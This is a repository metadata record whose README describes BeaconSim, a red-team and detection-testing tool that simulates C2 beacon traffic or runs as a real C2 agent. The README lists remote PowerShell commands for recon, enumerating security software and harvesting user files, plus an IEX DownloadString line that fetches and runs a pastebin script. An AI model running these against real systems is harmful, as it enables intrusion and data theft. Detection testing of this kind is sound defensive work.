{"id":28479221,"url":"https://github.com/acquiredsecurity/beaconsim","last_synced_at":"2026-03-03T20:32:54.306Z","repository":{"id":294736939,"uuid":"987896723","full_name":"acquiredsecurity/BeaconSim","owner":"acquiredsecurity","description":"Simulate Malware activity config connections via Yaml","archived":false,"fork":false,"pushed_at":"2025-05-29T13:18:17.000Z","size":30,"stargazers_count":10,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-02-07T13:36:01.907Z","etag":null,"topics":["beacon","eicar-test","malware","malwaresimulation"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/acquiredsecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-21T18:46:29.000Z","updated_at":"2025-10-13T14:04:55.000Z","dependencies_parsed_at":"2025-05-21T20:41:55.591Z","dependency_job_id":"1b572572-d5a3-4329-b70d-71286274f4b7","html_url":"https://github.com/acquiredsecurity/BeaconSim","commit_stats":null,"previous_names":["acquiredsecurity/beaconsim"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/acquiredsecurity/BeaconSim","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/releases","manifests_url":"https://repos.ecosyste.ms
/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/acquiredsecurity","download_url":"https://codeload.github.com/acquiredsecurity/BeaconSim/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/acquiredsecurity%2FBeaconSim/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30058292,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-03T18:21:05.932Z","status":"ssl_error","status_checked_at":"2026-03-03T18:20:59.341Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["beacon","eicar-test","malware","malwaresimulation"],"created_at":"2025-06-07T18:08:35.156Z","updated_at":"2026-03-03T20:32:54.276Z","avatar_url":"https://github.com/acquiredsecurity.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"## BeaconSim - C2 Beacon Simulator\nSimulate Malware activity. 
Configure connections via different ports and protocols with YAML.\n---\n\n\n\u003cimg width=\"611\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f8c162a8-d24b-4732-99b5-42d4cd0a4686\" /\u003e\n\n\n# BeaconSim - C2 Beacon Simulator \u0026 Agent\n\n![BeaconSim](https://img.shields.io/badge/Version-2.0-blue) ![Platform](https://img.shields.io/badge/Platform-Windows-lightgrey) ![Framework](https://img.shields.io/badge/.NET-Framework%204.8%20%7C%20.NET%209.0-purple)\n\nBeaconSim is a versatile cybersecurity tool that operates in two modes:\n1. **Beacon Simulation Mode** - Simulate malware C2 communications for testing detection systems\n2. **C2 Agent Mode** - Function as a real C2 agent for red team exercises and security research\n\nGreat for testing Threat Intelligence feeds, verifying detection logic in EDR and SIEMs, and conducting authorized security assessments!\n\n## 🚀 Quick Start\n\n### Simulation Mode (Original)\n```powershell\n.\\BeaconSim.exe --config=targets.yaml --minInterval=30 --maxInterval=120 --loopCount=10\n```\nRemove the C2 settings from the YAML if you want to use the original targets.\n\n\n### C2 Agent Mode (New)\n```powershell\n.\\BeaconSim.exe --c2\n```\n\n## 📖 Usage\n\n```\nBeaconSim - C2 Beacon Simulator \u0026 Agent\n----------------------------------------\nUsage:\n  BeaconSim.exe [--config=path] [--loopCount=N] [--c2]\n\nOptions:\n  --config=path        Path to YAML config file (default: targets.yaml)\n  --loopCount=N        Number of beacon attempts (-1 = infinite)\n  --c2                 Force C2 agent mode\n  --help, -h           Show this help menu and exit\n\nModes:\n  C2 Agent Mode:       Connects to C2 server and executes commands\n  Simulation Mode:     Original beacon simulation (legacy)\n\nExamples:\n  BeaconSim.exe --c2                           # Run as C2 agent\n  BeaconSim.exe --config=myconfig.yaml --c2   # Use custom config\n```\n\n## 🌐 Simulation Mode - Supported Protocols\n\nYou can specify one or more protocols 
per target in your `targets.yaml` config file. BeaconSim will simulate connection attempts using the selected protocols and ports.\n\n| Protocol | Description | Notes |\n|----------|-------------|--------|\n| `ping` | ICMP echo request (simulated) | Uses DNS resolution to simulate |\n| `http` | HTTP GET request | Port 80 by default |\n| `https` | HTTPS GET request (SSL/TLS) | Port 443 by default |\n| `dns` | DNS resolution via `Dns.GetHostAddressesAsync()` | Uses system resolver |\n| `tcp` | Raw TCP socket connection | Requires port(s) to be defined |\n| `ftp` | TCP connection on port 21 | Simulates basic connection only |\n| `ssh` | TCP connection on port 22 | No authentication performed |\n| `websocket` | WebSocket handshake (if implemented) | Falls back to HTTP(S) if needed |\n\n### Simulation Configuration Example\n```yaml\ntargets:\n  - host: \"8.8.8.8\"\n    protocols: [\"ping\", \"tcp\"]\n    ports: [53]\n  - host: \"google.com\"\n    protocols: [\"http\", \"tcp\"]\n    ports: [80, 443]\n  - host: \"github.com\"\n    protocols: [\"http\"]\n```\n\n## 🎯 C2 Agent Mode - Remote Command Execution\n\nWhen running with the `--c2` flag, BeaconSim connects to a C2 server and can execute remote PowerShell commands.\n\n### C2 Configuration Example\n```yaml\n# C2 Server Configuration\nc2_server:\n  url: \"http://192.168.1.100:8080\"\n  agent_id: \"agent_001\"\n\n# Beacon timing\nintervals:\n  min_interval: 30\n  max_interval: 120\n```\n\n### Compatible C2 Server\nBeaconSim C2 mode is designed to work with [SimpleC2Listener](https://github.com/acquiredsecurity/SimpleC2Listener).\n\n## 💻 Command Examples\n\nOnce connected to a C2 server, the following PowerShell commands can be executed remotely:\n\n### System Information\n```powershell\nwhoami\nsysteminfo\nGet-ComputerInfo | Select-Object WindowsProductName, TotalPhysicalMemory\n```\n\n### Process Enumeration\n```powershell\nGet-Process | Sort-Object CPU -Descending | Select-Object -First 10\nGet-Process | Where-Object 
{$_.ProcessName -match \"defender|kaspersky|symantec\"}\n```\n\n### Network Reconnaissance\n```powershell\nipconfig /all\nnetstat -an | findstr LISTENING\nGet-NetIPAddress | Where-Object {$_.AddressFamily -eq \"IPv4\"}\n```\n\n### File System Access\n```powershell\ndir C:\\Users\nGet-ChildItem C:\\ -Recurse -Include *.txt,*.doc -ErrorAction SilentlyContinue\n```\n\n### Remote Script Execution\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/SCRIPT_ID')\n```\n\n## 🔧 Configuration\n\n### Full Configuration Example\n```yaml\n# C2 Server Configuration (for agent mode)\nc2_server:\n  url: \"http://192.168.1.100:8080\"\n  agent_id: \"agent_001\"\n\n# Beacon timing\nintervals:\n  min_interval: 30\n  max_interval: 120\n\n# Targets (for simulation mode)\ntargets:\n  - host: \"8.8.8.8\"\n    protocols: [\"ping\", \"tcp\"]\n    ports: [53]\n  - host: \"google.com\"\n    protocols: [\"http\", \"tcp\"]\n    ports: [80, 443]\n  - host: \"1.1.1.1\"\n    protocols: [\"ping\"]\n  - host: \"github.com\"\n    protocols: [\"http\"]\n  - host: \"example.com\"\n    protocols: [\"ping\", \"http\", \"https\", \"dns\", \"tcp\", \"ftp\", \"websocket\"]\n    ports: [80, 443, 21, 22]\n```\n\n## 🛡️ Security Considerations\n\n**Important:** This tool is designed for authorized security testing and educational purposes only.\n\n### C2 Agent Mode\n- **No encryption** - Communications sent in plaintext HTTP\n- **PowerShell execution** - Executes commands with current user privileges\n- **Network traffic** - Generates detectable C2 traffic patterns\n- **System access** - Can read files and execute system commands\n\n### Simulation Mode\n- **Network connections** - Creates actual network connections to target hosts\n- **DNS queries** - Generates real DNS resolution requests\n- **Detection testing** - Designed to trigger security monitoring systems\n\n## 📋 System Requirements\n\n- **OS:** Windows 10/11, Windows Server 2016+\n- **Framework:** .NET Framework 4.8+ 
or .NET 9.0+\n- **Dependencies:** \n  - YamlDotNet (for configuration parsing)\n  - Newtonsoft.Json (for C2 communications)\n- **Network:** Internet connectivity for external targets\n- **PowerShell:** Version 5.0+ (for C2 agent mode)\n\n## 🔮 Use Cases\n\n### Security Testing\n- **Red Team Exercises** - Simulate real C2 communications\n- **Blue Team Training** - Generate known-bad traffic for detection testing\n- **SOC Training** - Practice incident response with controlled C2 activity\n- **Tool Validation** - Test EDR, SIEM, and network monitoring tools\n\n### Research and Development\n- **Malware Analysis** - Study C2 communication patterns\n- **Detection Research** - Develop new detection algorithms\n- **Network Security** - Test network segmentation and monitoring\n\n## 📚 Related Projects\n\n- **[SimpleC2Listener](https://github.com/acquiredsecurity/SimpleC2Listener)** - Compatible C2 server for agent mode\n- **BeaconSim Wiki** - Additional documentation and examples\n\n## ⚠️ Disclaimer\n\nThis software is provided for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with all applicable laws and regulations. Only use this tool on systems you own or have explicit permission to test. The authors assume no liability for misuse of this software.\n\n## 📄 License\n\nThis project is licensed under the MIT License - see the LICENSE file for details.\n\n---\n\n**AcquiredSecurity** - Advancing cybersecurity through practical tools and research.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Facquiredsecurity%2Fbeaconsim","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Facquiredsecurity%2Fbeaconsim","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Facquiredsecurity%2Fbeaconsim/lists"}